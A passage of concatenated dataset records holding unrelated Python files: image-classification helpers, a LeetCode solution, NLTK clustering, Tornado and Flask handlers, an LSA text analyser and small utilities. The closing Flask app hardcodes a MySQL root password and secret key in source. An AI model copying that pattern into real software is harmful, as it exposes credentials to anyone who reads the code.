label_col, balance):\n    '''\n    Oversamples df entries for balanced datasets\n    '''\n    labels = df[label_col].unique()\n    n_max = df[label_col].value_counts()[0]\n    label_dfs = []\n    for label in labels:\n        temp_df = df[df[label_col]==label]\n        n_label = len(temp_df)\n        # While class is unbalanced, sample and concat\n        while (n_label <= balance*n_max):\n            samp_df = temp_df.sample(n=1)\n            temp_df = pd.concat([temp_df, samp_df])\n            n_label = len(temp_df)\n        label_dfs.append(temp_df)\n    # Join the oversampled dfs for each label\n    balanced_df = pd.concat(label_dfs)\n    return balanced_df\n\n\ndef drop_images(df, fname_col, img_path):\n    '''\n    Drops unreadable images from dataframe\n    '''\n    bad_imgs = []\n    for idx in df.index:\n        fname = img_path + '/' + 
df.loc[idx][fname_col]\n try:\n _img = Image.open(fname)\n except:\n bad_imgs.append(idx)\n print(idx, df.loc[idx][fname_col], 'dropped from df')\n return df.drop(bad_imgs)\n\n\ndef shannon_entropy(pred_list):\n '''\n Returns Shannon entropy (base 2) for set of predictions in bits\n '''\n entropy = 0.0\n for pred in pred_list:\n if pred > 0.0:\n entropy -= pred * np.log2(pred)\n else:\n entropy += 0.0\n return entropy\n\n\ndef kl_divergence(exp_dist, pred_dist):\n '''\n Returns Kullback-Leibler (KL) Divergence for set of predictions in bits\n Inputs : exp_dist (list of floats, UOC mixture fractions ground truth, P)\n pred_dist (list of floats, predicted CNN softmax scores, Q)\n '''\n dkl = 0.0\n for i in range(0,len(pred_dist)):\n if (pred_dist[i] > 0.0) and (exp_dist[i] > 0.0):\n dkl += exp_dist[i] * np.log2(exp_dist[i]/pred_dist[i])\n else:\n dkl += 0.0\n return dkl\n\n\ndef series2list(pred_series, n_classes):\n '''\n Encodes softmax scores for entropy or KL divergence calculation\n Inputs : pred_series (pandas series from prediction df)\n n_classes (number of classes, int 5 or 16)\n Outputs : pred_list (list of n_classes softmax scores)\n '''\n # Get correct label set\n if n_classes == 5:\n label_set = [\"ADU\", \"AUC\", \"MDU\", \"SDU\", \"UO4\"]\n elif n_classes == 16:\n label_set = ['ADU-U3O8','ADU-UO2','ADU-UO3','AUC-U3O8','AUC-UO3',\\\n 'AUCd-UO2','AUCi-UO2','MDU-U3O8','MDU-UO2','MDU-UO3',\\\n 'SDU-U3O8','SDU-UO2','SDU-UO3','UO4-U3O8','UO4-UO2','UO4-UO3']\n else:\n print(\"Invalid number of classes\")\n return []\n # Fill list with predictions\n pred_list = []\n for item in label_set:\n col_name = item + \"_prob\"\n pred_list.append(pred_series[col_name])\n return pred_list\n\n\ndef get_hfw(fname):\n '''\n Returns image horizontal field width (in um) from file name\n '''\n hfw_str = img_info(fname=fname, fields=\"default\")['HFW']\n try:\n # Assume HFW in microns is w/o units\n hfw_num = np.float(hfw_str)\n except:\n if \"um\" in hfw_str:\n # If HFW has \"um\" at end\n hfw_num = np.float(hfw_str[:-2])\n elif \"mm\" in hfw_str:\n # If HFW has \"mm\" at end\n hfw_num = np.float(hfw_str[:-2])*1000.0\n elif (\"HFW\" in hfw_str) and (\"pt\" in hfw_str):\n # If HFW uses \"HFWxptx\" notation\n hfw_str = hfw_str.split('HFW')[1].split('pt')\n hfw_num = np.float(hfw_str[0] + \".\" + hfw_str[1])\n else:\n # If nothing can be done with HFW field\n hfw_num = \"NA\"\n # return value\n return hfw_num\n\n\ndef get_scalebar(full_hfw, full_width, sub_width):\n '''\n Returns scalebar size for SEM images\n '''\n # Calculate pixels per micron\n bar_px = full_width / full_hfw\n bar_scale = 1.0\n # Set dimensions of scalebar\n ii = 0\n while (int(bar_px) > 0.9*sub_width) and (ii < 20):\n bar_px = bar_px / 2\n bar_scale = bar_scale / 2\n ii += 1\n # Convert from um to nm if necessary\n if bar_scale < 1.0:\n bar_scale = np.int(bar_scale * 1000.0)\n units = \"nm\"\n else:\n units = \"um\"\n return int(bar_px), np.round(bar_scale,2), units\n\n\ndef convert_labels2sm(dpath, old_fname, new_fname, savefile):\n '''\n Converts Part 3 labels (StartingMaterial-Material) to SM only\n '''\n print(old_fname, \"->\", new_fname)\n # Change label to SM\n old_df = pd.read_csv(dpath+\"\\\\\"+old_fname, index_col='Img_ID')\n print(\"Old classes: \", old_df['label'].unique())\n old_df['label'] = old_df['StartingMaterial']\n # Standardize labels\n old_df = old_df.replace(['UO2(HNO3)2','UO4-2H2O'], 'UO4')\n old_df = old_df.replace(['AUCi','AUCd'], 'AUC')\n #\n new_df = old_df\n print(\"New classes: \", 
new_df['label'].unique())\n #\n if savefile is True:\n new_df.to_csv(dpath+\"\\\\\"+new_fname, index='Img_ID')\n return new_df\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":12423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422476246","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapNodes(self, head: ListNode, k: int) -> ListNode:\n listLength, frontNode, endNode, currentNode = 0, None, None, head\n while currentNode != None:\n listLength += 1\n if endNode != None:\n endNode = endNode.next\n if listLength == k:\n frontNode = currentNode\n endNode = head\n currentNode = currentNode.next\n frontNode.val, endNode.val = endNode.val, frontNode.val\n return head","sub_path":"LeetCode/March Leetcoding Challenge/Swapping Nodes in a Linked List.py","file_name":"Swapping Nodes in a Linked List.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68898019","text":"\nfrom __future__ import print_function\nimport numpy as np\nimport pandas as pd\nimport nltk\nimport re\nimport os\nimport codecs\nfrom sklearn import feature_extraction\nimport mpld3\nfrom nltk.stem.snowball import SnowballStemmer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.cluster import KMeans\nfrom sklearn.externals import joblib\n\ndef tokenize_and_stem(text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token\n tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n stems = [stemmer.stem(t) for t in filtered_tokens]\n return stems\n\n\ndef tokenize_only(text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token\n tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n return filtered_tokens\n\nstopwords = nltk.corpus.stopwords.words('english')\nprint(stopwords[:10])\nstemmer = SnowballStemmer(\"english\")\n#not super pythonic, no, not at all.\n#use extend so it's a big flat list of vocab\ntotalvocab_stemmed = []\ntotalvocab_tokenized = []\nsynopses=[]\nsynopsis=\"\"\nfor line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_imdb.txt'):\n\tline=line.rstrip('\\n') \n\tif line == \" BREAKS HERE\":\n\t\tsynopses.append(synopsis)\n\t\tsynopsis=\"\"\n\telif line not in ['\\n', '\\r\\n']:\n\t\tsynopsis+=line\ncnt=0\nfor line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_wiki.txt'):\n\tline=line.rstrip('\\n') \n\tif \"BREAKS HERE\" in line:\n\t\tsynopses[cnt]+=synopsis\n\t\tsynopsis=\"\"\n\t\tcnt+=1\n\telif line not in ['\\n', '\\r\\n'] and \"Plot [edit] [ [ edit edit ] ]\" not in line:\n\t\tsynopsis+=line\nfor i in synopses:\n allwords_stemmed = tokenize_and_stem(i.decode('utf8')) #for each item in 'synopses', tokenize/stem\n 
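# keep the stemmed and raw token lists index-aligned so vocab_frame can map stems back to words\n    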
totalvocab_stemmed.extend(allwords_stemmed) #extend the 'totalvocab_stemmed' list\n \n allwords_tokenized = tokenize_only(i.decode('utf8'))\n totalvocab_tokenized.extend(allwords_tokenized)\n\nvocab_frame = pd.DataFrame({'words': totalvocab_tokenized}, index = totalvocab_stemmed)\nprint ('there are ' + str(vocab_frame.shape[0]) + ' items in vocab_frame')\nprint (vocab_frame.head())\n\n#define vectorizer parameters\ntfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000,\n min_df=0.2, stop_words='english',\n use_idf=True, tokenizer=tokenize_and_stem, ngram_range=(1,3))\n\ntfidf_matrix = tfidf_vectorizer.fit_transform(synopses) #fit the vectorizer to synopses\nprint(tfidf_matrix.shape)\n\nterms = tfidf_vectorizer.get_feature_names()\ndist = 1 - cosine_similarity(tfidf_matrix)\n\nnum_clusters = 5\nkm = KMeans(n_clusters=num_clusters)\nkm.fit(tfidf_matrix)\nclusters = km.labels_.tolist()\nprint(km)\n\njoblib.dump(km, 'doc_cluster.pkl')\nkm = joblib.load('doc_cluster.pkl')\nclusters = km.labels_.tolist()\ntitles=[]\ntitles = [line.rstrip('\\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')]\nranks = [line for line in range(1,101)] \ngenres=[]\ngenres = [line.rstrip('\\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')]\nfilms = { 'title': titles, 'rank': ranks, 'synopsis': synopses, 'cluster': clusters, 'genre': genres }\n\nframe = pd.DataFrame(films, index = [clusters] , columns = ['rank', 'title', 'cluster', 'genre'])\nframe['cluster'].value_counts() #number of films per cluster (clusters from 0 to 4)\nprint(frame['cluster'].value_counts()) #number of films per cluster (clusters from 0 to 4)\n\ngrouped = frame['rank'].groupby(frame['cluster']) #groupby cluster for aggregation purposes\ngrouped.mean() #average rank (1 to 100) per cluster\nprint (grouped.mean())\n\nprint(\"Top terms per cluster:\")\nprint()\n#sort cluster centers by proximity to centroid\norder_centroids = km.cluster_centers_.argsort()[:, ::-1] \n\nfor i in range(num_clusters):\n print(\"Cluster %d words:\" % i, end='')\n \n for ind in order_centroids[i, :6]: #replace 6 with n words per cluster\n print(' %s' % vocab_frame.ix[terms[ind].split(' ')].values.tolist()[0][0].encode('utf-8', 'ignore'), end=',')\n print() #add whitespace\n print() #add whitespace\n \n print(\"Cluster %d titles:\" % i, end='')\n for title in frame.ix[i]['title'].values.tolist():\n print(' %s,' % title, end='')\n print() #add whitespace\n print() #add whitespace\n \nprint()\nprint()\n","sub_path":"Cluster/stopwords.py","file_name":"stopwords.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278113828","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport json\nimport tornado.web\nfrom modules.input.tcp_udp_plugin_manage import TcpUdpPluginManage\n\nerrmsg = {}\n\n\nclass TcpUdpListHandler(tornado.web.RequestHandler):\n \"\"\"\n \"\"\"\n def get(self):\n \"\"\"\n \"\"\"\n try:\n start = int(self.request.query_arguments['start'][0])\n limit = int(self.request.query_arguments['limit'][0])\n result = TcpUdpPluginManage.list(start, limit)\n\n if result:\n self.write(json.dumps(result))\n else:\n self.set_status(404)\n except Exception as ex:\n errmsg['message'] = str(ex)\n self.write(errmsg)\n 
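# surface the failure to the caller as an internal server error\n            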
self.set_status(500)\n","sub_path":"docker/container_install_script/docker-container-installer/anyrobot/etl/etl_server/handlers/input/tcp_udp/list_handler.py","file_name":"list_handler.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560984187","text":"# -*- coding: utf-8 -*-\n\"\"\"Display data in the CLI using Rich.\"\"\"\nfrom typing import List, Union\n\nimport pandas as pd\nfrom rich import box\nfrom rich.live import Live\nfrom rich.table import Table\n\nCandles = List[List[List[Union[int, float]]]]\n\n\ndef setup_table() -> Table:\n \"\"\"Create Rich table layout.\n\n Returns:\n Table: Include desired description and columns.\n \"\"\"\n table = Table(\n show_header=True,\n caption=caption(),\n box=box.MINIMAL_HEAVY_HEAD,\n header_style='bold #ffff00',\n title='CRYPTO CANDLESTICKS',\n title_style='bold #54ff00 underline',\n show_lines=True,\n safe_box=True,\n expand=True,\n )\n\n table.add_column('OPEN', justify='center', no_wrap=True)\n table.add_column('CLOSE', justify='center', no_wrap=True)\n table.add_column('HIGH', justify='center', no_wrap=True)\n table.add_column('LOW', justify='center', no_wrap=True)\n table.add_column('VOLUME', justify='center', no_wrap=True)\n table.add_column('TICKER', justify='center', no_wrap=True)\n table.add_column('INTERVAL', justify='center', no_wrap=True)\n table.add_column('TIME', justify='center', no_wrap=True)\n\n return table\n\n\ndef write_to_column(\n ticker: str,\n interval: str,\n data_downloaded: Candles,\n live: Live,\n) -> Table:\n \"\"\"Write data to console.\n\n Args:\n ticker (str): Quote + base currency.\n interval (str): Candlestick interval.\n data_downloaded (Candles): Response from the exchange.\n live (Live): Context manager.\n\n Returns:\n Table: Updated table to be rendered.\n \"\"\"\n table = setup_table()\n for row_limit, single_candle in enumerate(data_downloaded[::-1]):\n table.add_row(\n f'[bold white]{single_candle[2]}[/bold white]', # Open\n f'[bold white]{single_candle[1]}[/bold white]', # Close\n f'[bold white]{single_candle[3]}[/bold white]', # High\n f'[bold white]{single_candle[4]}[/bold white]', # Low\n f'[bold white]{single_candle[5]}[/bold white]', # Volume\n f'[bold white]{ticker}[/bold white]',\n f'[bold white]{interval}[/bold white]',\n f\"[bold white]{pd.to_datetime(single_candle[0], unit='ms')}[/bold white]\",\n )\n if row_limit == 15:\n live.update(table)\n break\n live.update(table)\n return table\n\n\ndef caption() -> str:\n \"\"\"Caption to be displayed at the end.\n\n Returns:\n str: Message for the users.\n \"\"\"\n return 'Thank you for using crypto-candlesticks\\\n Consider supporting your developers\\\n ETH: 0x06Acb31587a96808158BdEd07e53668d8ce94cFE\\\n '\n","sub_path":"src/crypto_candlesticks/text_console.py","file_name":"text_console.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333290320","text":"import numpy as np\nimport random\nimport re\nimport nltk.data\nfrom nltk.corpus import stopwords\nfrom sklearn.cluster import KMeans\n\n#region constants\nURL_REGEX = r'''(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))'''\nEPS = 1e-16\n#endregion\n\n# Summary:\n# Main class for text analysis\n# Contains all methods and algorithms\nclass 
TextAnalyser(object):\n    def __init__(self):\n        self._stop_words = stopwords.words('english')\n\n    # Summary:\n    #   Generates a random hexadecimal color\n    # params: None\n    # return: String | hex color\n    def genRandColor(self):\n        r = lambda: random.randint(0, 255)\n        return '#%02X%02X%02X' % (r(), r(), r())\n\n    # Summary:\n    #   tokenization, removal of unnecessary chars and stopwords\n    # params: text String\n    # return: text String, text_words list\n    def process_text(self, text):\n        # remove links\n        try:\n            pattern = URL_REGEX\n            pattern_obj = re.compile(pattern=pattern, flags=re.MULTILINE)\n            text = pattern_obj.sub('', text)\n        except Exception as ex:\n            print(ex.args)\n\n        # remove symbols (note: \"'s\" must be stripped before the bare\n        # apostrophe is removed, otherwise it can never match)\n        text = text.replace(',', ' ') \\\n            .replace('.', ' ') \\\n            .replace(':', ' ') \\\n            .replace('-', ' ') \\\n            .replace('_', ' ') \\\n            .replace('!', ' ') \\\n            .replace('?', ' ') \\\n            .replace('\\n', ' ') \\\n            .replace(\"'s\", '') \\\n            .replace(\"'\", '') \\\n            .replace('\"', '') \\\n            .replace('#', '') \\\n            .replace('@', '') \\\n            .replace('>', '') \\\n            .replace('&', '') \\\n            .replace('^', '') \\\n            .replace('|', '') \\\n            .lower()\n\n        # remove stop words and define corpus\n        tmp = text.split(' ')\n        text_words = [word for word in tmp if word not in self._stop_words]\n        text_words = list(set(text_words))\n        text_words.sort()\n        if '' in text_words:\n            text_words.remove('')\n\n        return text, text_words\n\n    # Summary:\n    #   counts instances of word in text\n    # params: word String, text String\n    # return: count Int\n    def count_word_in_text(self, word, text):\n        count = 0\n        if word is not None and text is not None:\n            word = word.lower()\n            # use [0] to get only text\n            text = self.process_text(text)[0]\n\n            count = text.split().count(word)\n        return count\n\n    # Summary:\n    #   Uses NLTK to retrieve sentences from text\n    #   process_flag defines whether to call process_text() on each sentence\n    # params: text String, process_flag Bool\n    # return: list\n    def get_sentences(self, text, process_flag=False):\n        sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n        sentences = sent_detector.tokenize(text.strip())\n        if process_flag:\n            # use [0] to get only text\n            sentences = [self.process_text(sent)[0] for sent in sentences]\n        return sentences\n\n    # Summary:\n    #   applies LSA algorithm on unprocessed text\n    # params: text String, var_percent Int\n    # return: list of lists | clusters\n    def lsa_on_text(self, text, var_percent=-1):\n        m = self.get_text_matrix(text)\n        m = np.mat(m)\n        # log begin\n        # print(m)\n        # log end\n\n        # SVD decomposition\n        T, S, D = np.linalg.svd(m)\n\n        # get dim of reconstruction\n        variance = 0\n        reduced_dim = 0\n        if not(1 <= var_percent <= 99):\n            for i in range(0, len(S)//2):\n                reduced_dim += 1\n                variance += 0.5 * (S[i - 1] + S[i])\n        else:\n            variance_full = S.sum()\n            i = 0\n            while(var_percent / 100 * variance_full > variance):\n                reduced_dim += 1\n                variance += 0.5 * (S[i - 1] + S[i])\n                i += 1\n\n        # get the reconstruction\n        svd_reconstruction = T[:, 0:reduced_dim] * np.diag(S[0:reduced_dim]) * D[0:reduced_dim, :]\n        # log begin\n        # print(reduced_dim)\n        # print(svd_reconstruction)\n        # log end\n\n        # get cos (each to each)\n        # get clusters\n        rel_matr = []\n        for i in range(1, len(m.T)):\n            rel_matr.append([])\n            for j in range(0, i):\n                scalar_prod = m.T[i] * m.T[j].T\n                n1 = np.linalg.norm(m.T[i])\n                n2 = np.linalg.norm(m.T[j])\n                ncos = float(scalar_prod / n1 / n2)\n                rel_matr[i - 1].append(ncos)\n\n        clusters = self.clusterize(rel_matr, len(m.T), EPS)\n        clusters.sort()\n        return clusters\n\n    # Summary:\n    #   converts clusters into json result for backend\n    # params: clusters list of lists, 
text String\n    # return: list of lists | json array\n    def get_json_result(self, clusters, text):\n        result_sentences = self.get_sentences(text, process_flag=False)\n        # log begin\n        # print('log:clusters:{0}'.format(clusters))\n        # log end\n        # form array of arrays for sentences of text\n        json_result = []\n        for cluster in clusters:\n            clusterColor = self.genRandColor()\n            json_result.append([])\n            for index in cluster:\n                json_result[clusters.index(cluster)] \\\n                    .append({\n                        'cluster_index': clusters.index(cluster),\n                        'text': result_sentences[index - 1],\n                        'color': clusterColor\n                    })\n        return json_result\n\n    # Summary:\n    #   generates matrix for word presence in sentences of 'text'\n    # params: text String\n    # return: list of lists | text matrix\n    def get_text_matrix(self, text):\n        sentences = self.get_sentences(text, process_flag=True)\n        processed_text, text_words = self.process_text(text)\n        # log begin\n        # print(processed_text)\n        # print(sentences)\n        # print(text_words)\n        # log end\n        # create a matrix\n        m = []\n        for i in range(len(text_words)):\n            m.append([])\n            for sent in sentences:\n                tmp = self.count_word_in_text(text_words[i], sent)\n                m[i].append(tmp)\n        return m\n\n    # Summary:\n    #   applies text processing on 'text'\n    #   and clusters sentences into topics\n    # params: text String, n_clusters Int\n    # return: list of lists | array of clusters\n    def kmeans_on_text(self, text, n_clusters):\n        # get vectors\n        m = self.get_text_matrix(text)\n        X = np.array(m).T\n\n        # fit predict\n        kmeans = KMeans(n_clusters=n_clusters)\n        fit_result = kmeans.fit_predict(X=X)\n\n        # clusterize\n        clusters = []\n        val_set = set(fit_result)\n        for el in val_set:\n            indices = [i for i, x in enumerate(fit_result) if x == el]\n            clusters.append(indices)\n\n        # adjust fit_result to lsa clusters result\n        clusters = [[i+1 for i in arr] for arr in clusters]\n        clusters.sort()\n        return clusters\n\n    # Summary:\n    #   compare two lists of clusters\n    # params: clusters1 list of lists, clusters2 list of lists\n    # return: double | percent of correctly clustered sentences\n    def compare_clusters(self, original, current):\n        original = original.copy()\n        current = current.copy()\n        # sort each\n        for cluster in original: cluster.sort()\n        for cluster in current: cluster.sort()\n        original.sort()\n        current.sort()\n\n        length = len([el for cluster in original for el in cluster])\n\n        anti_counter1 = 0\n        for cluster_orig in original:\n            for cluster_curr in current:\n                if cluster_orig[0] == cluster_curr[0]:\n                    if len(cluster_orig) == len(cluster_curr):\n                        for i in range(len(cluster_orig)):\n                            if cluster_orig[i] != cluster_curr[i]:\n                                anti_counter1 += 1\n                    else:\n                        anti_counter1 += len(cluster_orig)\n                        for el in cluster_orig:\n                            for nel in cluster_curr:\n                                if nel == el:\n                                    anti_counter1 -= 1\n                                    break\n                    break\n                elif cluster_curr == current[-1]:\n                    anti_counter1 += len(cluster_orig)\n\n        # reverse each\n        for cluster in original: cluster.reverse()\n        for cluster in current: cluster.reverse()\n        original.reverse()\n        current.reverse()\n\n        anti_counter2 = 0\n        for cluster_orig in original:\n            for cluster_curr in current:\n                if cluster_orig[0] == cluster_curr[0]:\n                    if len(cluster_orig) == len(cluster_curr):\n                        for i in range(len(cluster_orig)):\n                            if cluster_orig[i] != cluster_curr[i]:\n                                anti_counter2 += 1\n                    else:\n                        anti_counter2 += len(cluster_orig)\n                        for el in cluster_orig:\n                            for nel in cluster_curr:\n                                if nel == el:\n                                    anti_counter2 -= 1\n                                    break\n                    break\n                elif cluster_curr == current[-1]:\n                    anti_counter2 += len(cluster_orig)\n\n        return 1 - min([anti_counter1,anti_counter2]) / length\n\n    # Summary:\n    #   gets minimum ncos value from 
vector v1 (column number)\n    #   to other vectors in the cluster\n    # params: v1 Int, rels list, rel_matr Numpy.Matrix\n    # return: Float\n    def get_min_cos(self, v1, rels, rel_matr):\n        cos_s = []\n        for rel in rels:\n            if rel != v1:\n                try:\n                    if v1 - 2 < 0:\n                        # the raise is used as a goto into the except branch,\n                        # which reads the symmetric matrix entry instead\n                        raise Exception('unknown exception in get_min_cos')\n                    cos_s.append(rel_matr[v1 - 2][rel - 1])\n                except:\n                    if rel - 2 < 0:\n                        raise Exception('unknown exception in get_min_cos')\n                    cos_s.append(rel_matr[rel - 2][v1 - 1])\n        return min(cos_s)\n\n    # Summary:\n    #   splits the clusters that have same elements\n    # params: all_relations list of lists, rel_matr Numpy.Matrix\n    # return: list of lists - clusters with unique elements\n    def inner_split(self, all_relations, rel_matr):\n        for i in range(len(all_relations) - 1):\n            for j in range(i + 1, len(all_relations)):\n                for v1 in all_relations[i]:\n                    for v2 in all_relations[j]:\n                        if v1 == v2:\n                            if self.get_min_cos(v1, all_relations[i], rel_matr) > \\\n                                    self.get_min_cos(v2, all_relations[j], rel_matr):\n                                all_relations[j].remove(v2)\n                            else:\n                                all_relations[i].remove(v1)\n        return all_relations\n\n    # Summary:\n    #   returns the exact clusters that correspond to similar sentences\n    # params: rel_matr Numpy.Matrix, contexts_count Int, min_cos_value Float\n    # return: list of lists\n    def clusterize(self, rel_matr, contexts_count, min_cos_value):\n        all_relations = []\n        contexts_range = [i + 1 for i in range(1, contexts_count)]\n\n        self.clusterize_recursive(rel_matr=rel_matr,\n                                  all_relations=all_relations,\n                                  contexts_range=contexts_range,\n                                  vector_index=1,\n                                  min_cos_value=min_cos_value\n                                  )\n        clusters = self.inner_split(all_relations, rel_matr)\n\n        return clusters\n\n    # Summary:\n    #   traverses recursively through rel_matrix columns\n    # params: rel_matr Numpy.Matrix, all_relations list\n    #         contexts_range list, vector_index Int\n    #         min_cos_value Float\n    # return: noreturn\n    def clusterize_recursive(self,\n                             rel_matr,\n                             all_relations,\n                             contexts_range,\n                             vector_index,\n                             min_cos_value\n                             ):\n        rels = [vector_index]\n        for i in range(len(rel_matr) - vector_index + 1):\n            if rel_matr[i + vector_index - 1][vector_index - 1] > min_cos_value:\n                rels.append(i + vector_index + 1)\n\n        all_relations.append(rels)\n\n        # subtract ranges\n        all_relations_joined = [all_relations[i][j]\n                                for i in range(len(all_relations))\n                                for j in range(len(all_relations[i]))]\n        least_range = [i if i not in all_relations_joined else -1 for i in contexts_range]\n        least_range = list(filter(lambda e: e != -1, least_range))\n        if len(least_range) == 0:\n            return\n        else:\n            self.clusterize_recursive(rel_matr=rel_matr,\n                                      all_relations=all_relations,\n                                      contexts_range=contexts_range,\n                                      vector_index=least_range[0],\n                                      min_cos_value=min_cos_value\n                                      )\n","sub_path":"TextAnalyser.py","file_name":"TextAnalyser.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347554354","text":"from flask import render_template, request, redirect, session, url_for, flash\nfrom server.models.resume_items import ResumeItem\n\ndef create():\n    print(request.form)\n    errors = ResumeItem.validate(request.form)\n    if errors:\n        for error in errors:\n            flash(error)\n        return render_template('/partials/errors.html'), 500\n    else:\n        ResumeItem.create(request.form, session['user_id'])\n        # return redirect(url_for('dashboard'))\n        return \"SUCCESS\"\n\ndef current_user(user_id):\n    resume_filter = request.args.get('content_type')\n    print(resume_filter)\n    resume_items = ResumeItem.query.filter_by(user_id=user_id, 
content_type=resume_filter).all()\n    print(resume_items)\n    return render_template('partials/resume_items.html', items=resume_items)","sub_path":"server/controllers/resume_items.py","file_name":"resume_items.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243330563","text":"\"\"\"\nSmall script for converting a graph in graphML format to .g format.\nThis is a lossy conversion, as only vertex numbers and \"name\" labels,\nand edge \"name\" labels will be preserved from the graphML file.\n\"\"\"\n\nfrom __future__ import print_function\nimport igraph\nimport sys\n\ndef usage():\n\tprint(\"Usage: python ./fromGraphML.py [path to graphML file] [path to output .g file]\")\n\tprint(\"Example: python fromGraphML.py carbon.graphML carbon.g\")\n\n\ndef main():\n\tif len(sys.argv) < 3:\n\t\tusage()\n\t\treturn 0\n\ttry:\n\t\topen(sys.argv[1],\"r\").close()\n\t\toutputFile = open(sys.argv[2],\"w+\")\n\t\tg = igraph.Graph.Read(sys.argv[1])\n\t\toutputFile.write(\"%Vertices\\n\")\n\t\tfor v in g.vs:\n\t\t\tline = str(v.index)+\" \"+v[\"name\"]\n\t\t\toutputFile.write(line+\"\\n\")\n\t\toutputFile.write(\"%Edges\\n\")\n\t\tfor e in g.es:\n\t\t\tline = str(e.source)+\" \"+str(e.target)+\" \"+e[\"name\"]\n\t\t\toutputFile.write(line+\"\\n\")\n\t\toutputFile.close()\n\texcept IOError:\n\t\tprint(\"Input file not found: \"+sys.argv[1])\n\t\treturn 0\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"fromGraphML.py","file_name":"fromGraphML.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601212836","text":"from Domain.cheltuieli import get_tipul, get_suma\n\n\ndef find_out_biggest_cheltuiala_for_tip(lst_cheltuieli):\n    '''\n    Returns the expense ('cheltuiala') with the largest amount for each expense type\n    :param lst_cheltuieli: a list of expenses\n    :return: a dictionary whose keys are expense types and whose values are the expenses (list elements)\n    '''\n    result = {}  # a dictionary with key: expense type, value: expense (the list element)\n    for cheltuiala in lst_cheltuieli:\n        tip = get_tipul(cheltuiala)\n        cost = get_suma(cheltuiala)\n        if tip not in result:  # the first expense of this type\n            result[tip] = cheltuiala\n        else:\n            if cost > get_suma(result[tip]):\n                result[tip] = cheltuiala\n    return result","sub_path":"Logic/cea_mai_mare_cheltuiala.py","file_name":"cea_mai_mare_cheltuiala.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23613175","text":"import time\n\nimport pymysql\nfrom flask import Flask, render_template, request, redirect, session, flash, url_for, send_from_directory\nimport os\n\nfrom daos.dao import JogoDao, UsuarioDao\nfrom models.jogoModel import Jogo\nfrom models.usuarioModel import Usuario\n\n\napp = Flask(__name__)\napp.secret_key = 'Israel'\n\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWD'] = '.,Avaiana41'\napp.config['MYSQL_HOST'] = '127.0.0.1'\napp.config['MYSQL_PORT'] = 3306\napp.config['UPLOADS_PATH'] = os.path.dirname(os.path.abspath(__file__)) + '/upload'\n\ndb = pymysql.connect(user='root',\n                     passwd='.,Avaiana41',\n                     host='127.0.0.1',\n                     db='jogoteca',\n                     port=3306)\n\njogoDao = JogoDao(db)\nusuarioDao = UsuarioDao(db)\n\nlistJogos = jogoDao.listar()\n\n@app.route('/')\ndef home():\n    listJogos = jogoDao.listar()\n    if 'usuario_logado' not in 
